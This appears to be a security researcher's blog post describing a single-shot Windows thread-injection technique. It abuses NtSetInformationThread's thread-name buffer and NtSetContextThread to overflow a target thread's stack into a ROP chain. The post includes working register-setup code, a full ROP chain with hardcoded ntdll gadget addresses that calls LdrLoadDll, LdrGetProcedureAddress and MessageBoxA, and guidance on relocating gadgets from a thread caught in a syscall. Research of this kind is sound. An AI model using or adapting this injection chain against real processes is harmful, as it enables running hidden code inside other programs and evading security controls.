I've recently been looking into NtSetContextThread as an exploit vector, and was looking at different ways of setting up state to load some code into our target thread and then execute it. The idea of ghost writing is pretty fun, but I wanted a way to do this in a single shot instead of having to loop over and have the thread otherwise in a waiting pattern (since we can't do anything useful when the thread is in a syscall).
NtSetInformationThread(ThreadNameInformation). Blah Cats wrote a piece on using this to allocate kernel pages and get a peek into where a thread's KTHREAD is stored, but we can also use this as an easy way to get data into a target thread. This is set up as a UNICODE_STRING in memory, which means we don't need to care about null-termination, we just provide a length and it copies the whole chunk with a
memmove() both when setting it and retrieving it. We can then use
NtSetContextThread() to make the app jump to a call to
NtQueryInformationThread(ThreadNameInformation), and if we set the stack right we can effectively overflow our own stack and return directly into the start of our ROP chain.
As usual, if you're following along at home you'll want a Windows 10 x64 kernel 20H2. Full PoC at github.com/samrussell/doublebarrell
Retrieving the ROP chain
The call to NtQueryInformationThread looks like this:
__kernel_entry NTSTATUS NtQueryInformationThread( [in] HANDLE ThreadHandle, [in] THREADINFOCLASS ThreadInformationClass, [in, out] PVOID ThreadInformation, [in] ULONG ThreadInformationLength, [out, optional] PULONG ReturnLength );
We can set the first 4 parameters to registers with
NtSetContextThread(), but the 5th one is a challenge. This is passed on the stack, and if it's set to 0 it's ignored, but if it's non-null then the call will dereference it to store the number of bytes copied. We aren't reading or writing memory directly so we have no guarantees of the state of the stack, so we have to find a way to set this ourselves.
Luckily for us, ntdll calls this in a bunch of different places. In nearly all of them it sets up the stack parameter first and then nukes all the volatile registers (bad), but there is one spot in
DbgUiConvertStateChangeStructureWorker() where it sets up the volatile registers and then loads the stack parameter:
So we can set the 5 parameters in RCX, RDX, R8, R9 and RDI, set RIP to 1800CC777 (relocated), and this will load RDI at [RSP+20] and then call NtQueryInformationThread.
One last thing is to carefully set the
ThreadInformation parameter so it overrides our return address on the stack.
NtQueryInformationThread() will write a
UNICODE_STRING structure, which is 2 WORDs with length and maximum length, and then an aligned pointer to our buffer, followed by the buffer itself. When we make the call we'll push another pointer onto the stack, so we need to load this at current RSP - 3x
context.ContextFlags = CONTEXT_FULL; GetThreadContext(hThread, &context); context.ContextFlags |= 0x03; context.Rsp = context.Rsp - 0x200 - sizeof(threadName); // make space on the stack context.Rcx = 0xFFFFFFFFFFFFFFFE; // -2 = current thread context.Rdx = 0x26; // ThreadNameInformation context.R8 = context.Rsp - 0x18; // overflow ourselves context.R9 = (threadInformation & 0xFFFF) + 0x10; // length context.Rdi = 0; // NULL, don't update us context.Rip = 0x7FFEE4F5C777; // relocated pointer SetThreadContext(hThread, &context);
So we set this up, and our target thread is straight into our ROP chain and will do what we like! Now for the proof of concept.
Shellcode courtesy of ntdll
At this point we search for gadgets that will let us pull the PEB out of
GS:30 plus a bunch of other arithmetic to locate
GetProcAddress. This gives us a big ugly ROP chain and requires a lot of gadgets to make it work. With ntdll we get a headstart with
RtlGetCurrentPeb(), but we still need a bunch of gadgets that do stuff to RAX and return, as well as ways to store our data in non-volatile registers for later. I had a browse with ROPgadget and wasn't happy with what I found, but then I realized that ntdll is actually all we need and we don't need any arithmetic at all.
LoadLibrary -> LdrLoadDll
If we pull open
kernelbase.dll we find that all roads lead to
LoadLibraryExW() which then calls
LdrLoadDll() in ntdll. According to ntinternals.net, we can call it as follows:
LdrLoadDll( 0, // optional 0, // optional &filename, // UNICODE_STRING &baseAddress // void* that receives the module address )
The awesome thing with this is that
baseAddress gets stored to a pointer of our choosing, so we can just point this to further down our ROPchain and it'll automatically get loaded into a register later on. Easy.
GetProcAddress -> LdrGetProcedureAddressForCaller()
GetProcAddress() is also backed by a function in ntdll. The
LdrGetProcedureAddressForCaller() function takes 6 params but there's another function that wraps it called
LdrGetProcedureAddress() that only takes 4:
LdrGetProcedureAddress( &baseAddress, // address we got from LdrLoadDll() &procName, // a STRING with the name of the function we want 0, // ordinal, given we're tailoring this to a specific build we can use this if we like &procAddress // void* that receives the function address
LdrLoadDll(), the last parameter is a pointer to where the function address will be stored, so this can point right back into our ROP chain too. All we need now is a couple of gadgets and we'll be sorted.
LdrpHandleInvalidUserCallTarget: the mother of all gadgets
All of this is static - we know our pointers, we know our arguments, and the two functions we call are loading the arguments right into our ROP chain. All we need now is a way to populate our volatile registers for parameters 1-4. Enter my favorite function in ntdll:
LdrpHandleInvalidUserCallTarget(). I don't know what this does, and I don't really care, but what I do care about is that it populates all of the registers we care about before returning:
So whenever we want to call a function we just need to set up the stack like this:
- address of LdrpHandleInvalidUserCallTarget gadget
- param 2 (RDX)
- param 1 (RCX)
- param 3 (R8)
- param 4 (R9)
- null (R10)
- null (R11)
- function we want to call
- address of return gadget
- 4x QWORD for shadow stack
I've also kept my data inline with my calls and just step over it when I'm done with it, and this gadget lets us dump up to 7 QWORDs at a time from the stack.
Putting it all together
Here's the full ROP chain I use to inject a MessageBox call:
// set up shellcode threadName = 0x7FFEE4F1C550; // populate registers threadName = 0; threadName = 0; threadName = context.R8 + 0x80; // &UNICODE_STRING("ntdll.dll") threadName = context.R8 + 0xB8; // &baseAddress threadName = 0; threadName = 0; threadName = 0x7FFEE4EA6A10; // LdrLoadDll threadName = 0x7FFEE4F1C553; // pop 4 registers // shadow stack break threadName = 0x7FFEE4F1C551; // pop 5 registers threadName = 0x0000000000160014; // UNICODE_STRING("ntdll.dll") threadName = context.R8 + 0x90; threadName = 0x0072006500730075; threadName = 0x0064002E00320033; threadName = 0x00000000006C006C; threadName = 0x7FFEE4F1C550; // populate registers threadName = context.R8 + 0x120; &STRING("MessageBoxA") threadName = 0; threadName = 0; threadName = context.R8 + 0x178; // &procAddress threadName = 0; threadName = 0; threadName = 0x7FFEE4F11AD0; // LdrGetProcedureAddress threadName = 0x7FFEE4F1C551; // pop 5 registers (shadow stack + 1xQWORD for alignment) // shadow stack break threadName = 0x7FFEE4F1C553; // pop 4 registers threadName = 0x00000000000C000B; // STRING("MessageBoxA") threadName = context.R8 + 0x130; threadName = 0x426567617373654D; threadName = 0x000000000041786F; threadName = 0x7FFEE4F1C550; // populate registers threadName = context.R8 + 0x188; // &message threadName = 0; threadName = context.R8 + 0x190; // &caption threadName = 0; threadName = 0; threadName = 0; threadName = 0; // MessageBoxA threadName = 0x7FFEE4E9DD1B; // infinite loop gadget (0xEB 0xFE) for debugging threadName = 0x00313144454E5750; threadName = 0x00747577206C6F6C;
A note on alignment
MessageBoxA() is one of those annoying functions that backs up the
XMM registers and just assumes the stack is 16-byte aligned. I've skipped over the details on this but you'll need to keep this in mind whenever you're building ROP chains that operate on anything that needs to be 16-byte aligned.
I've been testing this on easy mode (on a binary that has an infinite loop so doesn't end up in a syscall when we call
NtSetContextThread(), and doesn't appear to have ASLR enabled). We also jump out to an infinite loop gadget at the end to avoid cleanup.
Identifying and returning from a syscall
There are a few ways to figure this out,
R10 have some good clues,
RAX will be set to a low value corresponding to the syscall number, and
RIP should be quite high. We actually want to catch the thread in a syscall though, as this gives us a bunch of clues for where to offset our gadgets from. As mentioned in NINA, we can always set RIP to an infinite loop split instruction and jump out there (ntdll has tons to choose from) - once we're there we can do a second call to kick off our injection. You'll want to store
RAX after relocating to the infinite loop as you'll need to put this back when cleaning up (the
RAX you picked up in the syscall is there before the syscall itself returns).
The advantage of getting the thread context while it's in a syscall is that we know what it was called with (RAX), and the return address (RIP), which means we know exactly which function in ntdll was hit. We can then lookup the RVA, subtract it from RIP and we have the base of ntdll and can use that to adjust the addresses for our gadgets and function calls.
Unless your target thread has been naughty and stored data below RSP, all you need to do is fixup
RIP. Everything else that we clobbered also gets clobbered in a syscall so we don't care. We've left all our strings and gadget addresses in stack memory, so you're welcome to zero it out if you care, but that's an exercise for the reader.